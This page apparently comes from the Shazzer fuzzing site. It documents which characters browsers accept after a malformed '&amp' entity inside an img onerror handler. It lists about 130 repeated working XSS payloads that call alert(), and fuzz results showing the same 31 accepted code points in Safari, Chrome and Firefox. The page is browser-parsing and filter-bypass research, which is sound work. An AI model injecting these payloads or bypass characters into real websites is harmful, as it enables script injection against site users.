Shazzer logo

    Characters allowed after malformed entities

    This vector shows what characters are allowed after a malformed names entity.

    Created by: hackvertor

    Created on: 7/1/2024, 9:26:08 PM

    Updated on: 7/2/2024, 7:39:14 AM

    Vector type: XSS

    Template used:
    <img src=data: onerror="1&amp$[chr]log($[i])">
    Your browser was detected as:
    Detecting... Detecting... Detecting... Detecting...

    Sample payloads

    <img src=data: onerror="1&amp-alert(45)">
    <img src=data: onerror="1&amp
alert(10)">
    <img src=data: onerror="1&amp alert(8201)">
    <img src=data: onerror="1&amp alert(8192)">
    <img src=data: onerror="1&amp alert(8195)">
    <img src=data: onerror="1&amp alert(8199)">
    <img src=data: onerror="1&amp	alert(9)">
    <img src=data: onerror="1&amp alert(8200)">
    <img src=data: onerror="1&amp alert(8196)">
    <img src=data: onerror="1&amp alert(32)">
    <img src=data: onerror="1&ampalert(11)">
    <img src=data: onerror="1&amp alert(5760)">
    <img src=data: onerror="1&amp alert(8198)">
    <img src=data: onerror="1&amp&alert(38)">
    <img src=data: onerror="1&amp alert(8239)">
    <img src=data: onerror="1&amp alert(160)">
    <img src=data: onerror="1&amp alert(8202)">
    <img src=data: onerror="1&ampalert(65279)">
    <img src=data: onerror="1&amp~alert(126)">
    <img src=data: onerror="1&ampalert(12)">
    <img src=data: onerror="1&amp alert(8197)">
    <img src=data: onerror="1&amp!alert(33)">
    <img src=data: onerror="1&amp;alert(59)">
    <img src=data: onerror="1&amp
alert(13)">
    <img src=data: onerror="1&amp alert(12288)">
    <img src=data: onerror="1&amp alert(8193)">
    <img src=data: onerror="1&amp alert(8194)">
    <img src=data: onerror="1&amp
alert(8232)">
    <img src=data: onerror="1&amp+alert(43)">
    <img src=data: onerror="1&amp alert(8287)">
    <img src=data: onerror="1&amp
alert(8233)">
    <img src=data: onerror="1&amp alert(8202)">
    <img src=data: onerror="1&amp alert(8199)">
    <img src=data: onerror="1&amp alert(8198)">
    <img src=data: onerror="1&amp alert(8239)">
    <img src=data: onerror="1&amp alert(8287)">
    <img src=data: onerror="1&amp alert(8192)">
    <img src=data: onerror="1&amp
alert(8233)">
    <img src=data: onerror="1&amp&alert(38)">
    <img src=data: onerror="1&amp alert(12288)">
    <img src=data: onerror="1&amp alert(8197)">
    <img src=data: onerror="1&amp
alert(8232)">
    <img src=data: onerror="1&amp alert(8194)">
    <img src=data: onerror="1&amp+alert(43)">
    <img src=data: onerror="1&amp
alert(13)">
    <img src=data: onerror="1&amp alert(8193)">
    <img src=data: onerror="1&ampalert(65279)">
    <img src=data: onerror="1&amp alert(8196)">
    <img src=data: onerror="1&amp alert(8201)">
    <img src=data: onerror="1&amp-alert(45)">
    <img src=data: onerror="1&amp;alert(59)">
    <img src=data: onerror="1&ampalert(12)">
    <img src=data: onerror="1&amp
alert(10)">
    <img src=data: onerror="1&amp alert(5760)">
    <img src=data: onerror="1&amp~alert(126)">
    <img src=data: onerror="1&amp alert(8195)">
    <img src=data: onerror="1&amp alert(160)">
    <img src=data: onerror="1&ampalert(11)">
    <img src=data: onerror="1&amp alert(32)">
    <img src=data: onerror="1&amp!alert(33)">
    <img src=data: onerror="1&amp alert(8200)">
    <img src=data: onerror="1&amp	alert(9)">
    <img src=data: onerror="1&amp	alert(9)">
    <img src=data: onerror="1&amp
alert(10)">
    <img src=data: onerror="1&ampalert(11)">
    <img src=data: onerror="1&ampalert(12)">
    <img src=data: onerror="1&amp
alert(13)">
    <img src=data: onerror="1&amp alert(32)">
    <img src=data: onerror="1&amp!alert(33)">
    <img src=data: onerror="1&amp&alert(38)">
    <img src=data: onerror="1&amp+alert(43)">
    <img src=data: onerror="1&amp-alert(45)">
    <img src=data: onerror="1&amp;alert(59)">
    <img src=data: onerror="1&amp~alert(126)">
    <img src=data: onerror="1&amp alert(160)">
    <img src=data: onerror="1&amp alert(5760)">
    <img src=data: onerror="1&amp alert(8192)">
    <img src=data: onerror="1&amp alert(8193)">
    <img src=data: onerror="1&amp alert(8194)">
    <img src=data: onerror="1&amp alert(8195)">
    <img src=data: onerror="1&amp alert(8196)">
    <img src=data: onerror="1&amp alert(8197)">
    <img src=data: onerror="1&amp alert(8198)">
    <img src=data: onerror="1&amp alert(8199)">
    <img src=data: onerror="1&amp alert(8200)">
    <img src=data: onerror="1&amp alert(8201)">
    <img src=data: onerror="1&amp alert(8202)">
    <img src=data: onerror="1&amp
alert(8232)">
    <img src=data: onerror="1&amp
alert(8233)">
    <img src=data: onerror="1&amp alert(8239)">
    <img src=data: onerror="1&amp alert(8287)">
    <img src=data: onerror="1&amp alert(12288)">
    <img src=data: onerror="1&ampalert(65279)">
    <img src=data: onerror="1&amp alert(8193)">
    <img src=data: onerror="1&ampalert(12)">
    <img src=data: onerror="1&amp
alert(8232)">
    <img src=data: onerror="1&amp!alert(33)">
    <img src=data: onerror="1&ampalert(65279)">
    <img src=data: onerror="1&amp alert(8239)">
    <img src=data: onerror="1&amp alert(8200)">
    <img src=data: onerror="1&amp
alert(8233)">
    <img src=data: onerror="1&amp alert(8197)">
    <img src=data: onerror="1&amp alert(8287)">
    <img src=data: onerror="1&amp
alert(13)">
    <img src=data: onerror="1&amp alert(12288)">
    <img src=data: onerror="1&amp+alert(43)">
    <img src=data: onerror="1&ampalert(11)">
    <img src=data: onerror="1&amp alert(8192)">
    <img src=data: onerror="1&amp alert(32)">
    <img src=data: onerror="1&amp alert(8195)">
    <img src=data: onerror="1&amp alert(8194)">
    <img src=data: onerror="1&amp
alert(10)">
    <img src=data: onerror="1&amp	alert(9)">
    <img src=data: onerror="1&amp alert(5760)">
    <img src=data: onerror="1&amp&alert(38)">
    <img src=data: onerror="1&amp alert(8201)">
    <img src=data: onerror="1&amp~alert(126)">
    <img src=data: onerror="1&amp-alert(45)">
    <img src=data: onerror="1&amp alert(160)">
    <img src=data: onerror="1&amp alert(8198)">
    <img src=data: onerror="1&amp alert(8196)">
    <img src=data: onerror="1&amp alert(8202)">
    <img src=data: onerror="1&amp;alert(59)">
    <img src=data: onerror="1&amp alert(8199)">

    Fuzz results

    Safari logo
    Safari 17.5 mobile iOS 17.5.1
    Found 31 results
    DecHexChr
    909HT
    DecHexChr
    100aLF
    DecHexChr
    110bVT
    DecHexChr
    120cFF
    DecHexChr
    130dCR
    DecHexChr
    3220SPACE
    DecHexChr
    3321!
    DecHexChr
    3826&
    DecHexChr
    432b+
    DecHexChr
    452d-
    DecHexChr
    593b;
    DecHexChr
    1267e~
    DecHexChr
    160a0 
    DecHexChr
    57601680
    DecHexChr
    81922000 
    DecHexChr
    81932001
    DecHexChr
    81942002
    DecHexChr
    81952003
    DecHexChr
    81962004
    DecHexChr
    81972005
    DecHexChr
    81982006
    DecHexChr
    81992007
    DecHexChr
    82002008
    DecHexChr
    82012009
    DecHexChr
    8202200a
    DecHexChr
    82322028
    DecHexChr
    82332029
    DecHexChr
    8239202f
    DecHexChr
    8287205f
    DecHexChr
    122883000 
    DecHexChr
    65279feff
    Chrome logo
    Chrome 126.0.0.0 desktop macOS 10.15.7
    Found 31 results
    DecHexChr
    909HT
    DecHexChr
    100aLF
    DecHexChr
    110bVT
    DecHexChr
    120cFF
    DecHexChr
    130dCR
    DecHexChr
    3220SPACE
    DecHexChr
    3321!
    DecHexChr
    3826&
    DecHexChr
    432b+
    DecHexChr
    452d-
    DecHexChr
    593b;
    DecHexChr
    1267e~
    DecHexChr
    160a0 
    DecHexChr
    57601680
    DecHexChr
    81922000 
    DecHexChr
    81932001
    DecHexChr
    81942002
    DecHexChr
    81952003
    DecHexChr
    81962004
    DecHexChr
    81972005
    DecHexChr
    81982006
    DecHexChr
    81992007
    DecHexChr
    82002008
    DecHexChr
    82012009
    DecHexChr
    8202200a
    DecHexChr
    82322028
    DecHexChr
    82332029
    DecHexChr
    8239202f
    DecHexChr
    8287205f
    DecHexChr
    122883000 
    DecHexChr
    65279feff
    Firefox logo
    Firefox 127.0 desktop macOS 10.15
    Found 31 results
    DecHexChr
    909HT
    DecHexChr
    100aLF
    DecHexChr
    110bVT
    DecHexChr
    120cFF
    DecHexChr
    130dCR
    DecHexChr
    3220SPACE
    DecHexChr
    3321!
    DecHexChr
    3826&
    DecHexChr
    432b+
    DecHexChr
    452d-
    DecHexChr
    593b;
    DecHexChr
    1267e~
    DecHexChr
    160a0 
    DecHexChr
    57601680
    DecHexChr
    81922000 
    DecHexChr
    81932001
    DecHexChr
    81942002
    DecHexChr
    81952003
    DecHexChr
    81962004
    DecHexChr
    81972005
    DecHexChr
    81982006
    DecHexChr
    81992007
    DecHexChr
    82002008
    DecHexChr
    82012009
    DecHexChr
    8202200a
    DecHexChr
    82322028
    DecHexChr
    82332029
    DecHexChr
    8239202f
    DecHexChr
    8287205f
    DecHexChr
    122883000 
    DecHexChr
    65279feff
    Safari logo
    Safari 18.0 desktop macOS 10.15.7
    Found 31 results
    DecHexChr
    909HT
    DecHexChr
    100aLF
    DecHexChr
    110bVT
    DecHexChr
    120cFF
    DecHexChr
    130dCR
    DecHexChr
    3220SPACE
    DecHexChr
    3321!
    DecHexChr
    3826&
    DecHexChr
    432b+
    DecHexChr
    452d-
    DecHexChr
    593b;
    DecHexChr
    1267e~
    DecHexChr
    160a0 
    DecHexChr
    57601680
    DecHexChr
    81922000 
    DecHexChr
    81932001
    DecHexChr
    81942002
    DecHexChr
    81952003
    DecHexChr
    81962004
    DecHexChr
    81972005
    DecHexChr
    81982006
    DecHexChr
    81992007
    DecHexChr
    82002008
    DecHexChr
    82012009
    DecHexChr
    8202200a
    DecHexChr
    82322028
    DecHexChr
    82332029
    DecHexChr
    8239202f
    DecHexChr
    8287205f
    DecHexChr
    122883000 
    DecHexChr
    65279feff